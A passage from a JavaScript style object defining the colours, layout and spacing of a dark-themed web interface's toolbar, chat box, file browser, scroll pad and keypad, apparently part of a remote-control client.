    padding: '5px 12px',
    color: '#ff6b82',
    cursor: 'pointer',
    fontFamily: 'inherit',
    fontSize: 11,
    marginLeft: 'auto',
  },
  bottomToolbar: {
    position: 'fixed',
    bottom: 18,
    left: '50%',
    transform: 'translateX(-50%)',
    zIndex: 9997,
    display: 'flex',
    alignItems: 'center',
    gap: 6,
    background: 'linear-gradient(180deg, rgba(8,14,22,0.97), rgba(5,9,14,0.98))',
    border: '1px solid rgba(0,229,255,0.16)',
    borderRadius: 12,
    padding: '5px 8px',
    boxShadow: '0 8px 28px rgba(0,0,0,0.55), 0 0 0 1px rgba(0,229,255,0.06), inset 0 1px 0 rgba(255,255,255,0.04)',
    backdropFilter: 'blur(14px)',
  },
  toolbarBtn: {
    border: '1px solid rgba(0,229,255,0.14)',
    borderRadius: 8,
    padding: '6px 12px',
    cursor: 'pointer',
    fontFamily: 'inherit',
    fontSize: 11,
    fontWeight: 500,
    display: 'flex',
    alignItems: 'center',
    gap: 5,
    background: 'rgba(8,14,22,0.85)',
    color: '#8aa0b0',
    boxShadow: 'inset 0 1px 0 rgba(255,255,255,0.03)',
  },
  chatBox: {
    position: 'fixed',
    bottom: 70,
    left: '50%',
    transform: 'translateX(-50%)',
    background: 'linear-gradient(165deg, #0c141e, #080c12)',
    border: '1px solid rgba(0,229,255,0.15)',
    borderRadius: 14,
    padding: 16,
    display: 'flex',
    flexDirection: 'column',
    gap: 10,
    minWidth: 320,
    boxShadow: '0 12px 36px rgba(0,0,0,0.5)',
    zIndex: 9996,
  },
  panelLabel: {
    color: '#4a5a6a',
    fontSize: 10,
    letterSpacing: 1.8,
    fontWeight: 600,
    textTransform: 'uppercase',
  },
  chatInputRow: { display: 'flex', gap: 8 },
  chatInput: {
    flex: 1,
    background: 'rgba(6,10,16,0.9)',
    border: '1px solid rgba(0,229,255,0.12)',
    borderRadius: 10,
    padding: '9px 12px',
    color: '#e8f4f8',
    fontSize: 12,
    fontFamily: 'inherit',
    outline: 'none',
  },
  chatSendBtn: {
    background: 'linear-gradient(135deg, #00d4e8, #00a8c4)',
    border: '1px solid rgba(0,229,255,0.3)',
    borderRadius: 8,
    padding: '8px 13px',
    color: '#031018',
    cursor: 'pointer',
    fontFamily: 'inherit',
    fontSize: 12,
    fontWeight: 600,
    boxShadow: 'inset 0 1px 0 rgba(255,255,255,0.12)',
  },
  clipBtn: {
    flex: 1,
    background: 'rgba(8,14,22,0.92)',
    border: '1px solid rgba(0,229,255,0.14)',
    borderRadius: 8,
    padding: '7px 10px',
    color: '#8aa0b0',
    cursor: 'pointer',
    fontFamily: 'inherit',
    fontSize: 11,
    fontWeight: 500,
    textAlign: 'center',
  },
  scrollPad: {
    position: 'absolute',
    right: 16,
    bottom: 90,
    zIndex: 40,
    display: 'grid',
    gridTemplateColumns: 'repeat(3, 34px)',
    gridTemplateRows: 'repeat(3, 34px)',
    gap: 4,
    opacity: 0.9,
  },
  scrollPadBtn: {
    background: 'rgba(10,18,26,0.92)',
    border: '1px solid rgba(0,229,255,0.15)',
    color: '#8aa0b0',
    borderRadius: 8,
    fontSize: 14,
    cursor: 'pointer',
    display: 'flex',
    alignItems: 'center',
    justifyContent: 'center',
    userSelect: 'none',
    touchAction: 'none',
  },
  filePanel: { position: 'fixed', bottom: 70, right: 20, zIndex: 9996 },
  filePanelContent: {
    background: 'linear-gradient(165deg, #0c141e, #080c12)',
    border: '1px solid rgba(0,229,255,0.15)',
    borderRadius: 14,
    padding: 16,
    marginTop: 8,
    display: 'flex',
    flexDirection: 'column',
    gap: 10,
    minWidth: 340,
    maxWidth: 400,
    boxShadow: '0 12px 36px rgba(0,0,0,0.5)',
  },
  dropZone: {
    border: '1px dashed rgba(0,229,255,0.25)',
    borderRadius: 12,
    padding: '18px 12px',
    display: 'flex',
    flexDirection: 'column',
    alignItems: 'center',
    gap: 6,
    cursor: 'pointer',
    transition: 'all 0.2s',
    background: 'rgba(0,229,255,0.03)',
  },
  fileBtn: {
    background: 'rgba(8,14,22,0.92)',
    border: '1px solid rgba(0,229,255,0.22)',
    borderRadius: 8,
    padding: '7px 12px',
    color: '#00e5ff',
    cursor: 'pointer',
    fontFamily: 'inherit',
    fontSize: 12,
    fontWeight: 500,
  },
  fileStatus: {
    fontSize: 11,
    fontFamily: 'inherit',
    padding: '9px 10px',
    background: 'rgba(6,10,16,0.9)',
    borderRadius: 10,
    wordBreak: 'break-all',
    border: '1px solid rgba(0,229,255,0.1)',
  },
  fileBrowser: {
    background: 'rgba(6,10,16,0.9)',
    border: '1px solid rgba(0,229,255,0.1)',
    borderRadius: 12,
    overflow: 'hidden',
  },
  fileBrowserBar: {
    display: 'flex',
    alignItems: 'center',
    gap: 6,
    padding: '9px 10px',
    borderBottom: '1px solid rgba(0,229,255,0.08)',
    background: 'rgba(10,16,24,0.9)',
  },
  fileBrowserBackBtn: {
    background: 'rgba(8,14,22,0.92)',
    border: '1px solid rgba(0,229,255,0.14)',
    borderRadius: 7,
    padding: '4px 8px',
    color: '#8aa0b0',
    cursor: 'pointer',
    fontFamily: 'inherit',
    fontSize: 11,
    fontWeight: 500,
  },
  fileBrowserPath: {
    flex: 1,
    color: '#00e5ff',
    fontSize: 10,
    overflow: 'hidden',
    textOverflow: 'ellipsis',
    whiteSpace: 'nowrap',
    fontFamily: "'JetBrains Mono', monospace",
  },
  fileBrowserCloseBtn: {
    background: 'transparent',
    border: 'none',
    color: '#5a6a7a',
    cursor: 'pointer',
    fontSize: 14,
    padding: '0 4px',
  },
  fileBrowserLoading: {
    color: '#ffb020',
    fontSize: 11,
    padding: '14px',
    textAlign: 'center',
    display: 'flex',
    alignItems: 'center',
    justifyContent: 'center',
    gap: 8,
  },
  fileBrowserError: { color: '#ff6b82', fontSize: 11, padding: '12px' },
  fileBrowserEmpty: { color: '#4a5a6a', fontSize: 11, padding: '14px', textAlign: 'center' },
  fileBrowserList: { maxHeight: 260, overflowY: 'auto' },
  fileBrowserEntry: {
    display: 'flex',
    alignItems: 'center',
    gap: 6,
    padding: '9px 10px',
    borderBottom: '1px solid rgba(0,229,255,0.04)',
  },
  fileBrowserIcon: { fontSize: 13, flexShrink: 0 },
  fileBrowserName: {
    flex: 1,
    color: '#c8d8e4',
    fontSize: 12,
    overflow: 'hidden',
    textOverflow: 'ellipsis',
    whiteSpace: 'nowrap',
  },
  fileBrowserSize: { color: '#4a5a6a', fontSize: 10, flexShrink: 0 },
  fileBrowserDl: {
    background: 'rgba(0,36,28,0.7)',
    border: '1px solid rgba(0,255,157,0.28)',
    borderRadius: 7,
    padding: '3px 8px',
    color: '#00ff9d',
    cursor: 'pointer',
    fontSize: 11,
    fontWeight: 500,
    flexShrink: 0,
  },
  fileBrowserArrow: { color: '#4a5a6a', fontSize: 16, flexShrink: 0 },
  keypadPanel: {
    background: 'linear-gradient(165deg, #0c141e, #080c12)',
    border: '1px solid rgba(0,229,255,0.12)',
    borderTop: 'none',
    padding: '12px 20px',
    display: 'flex',
    flexDirection: 'column',
    gap: 8,
  },
  keypadBtn: {
    background: 'rgba(8,14,22,0.92)',
    border: '1px solid rgba(0,229,255,0.16)',
    borderRadius: 7,
    padding: '6px 10px',
    color: '#00e5ff',
    cursor: 'pointer',
    fontFamily: 'inherit',
    fontSize: 11,
    fontWeight: 500,
    whiteSpace: 'nowrap',
  },
};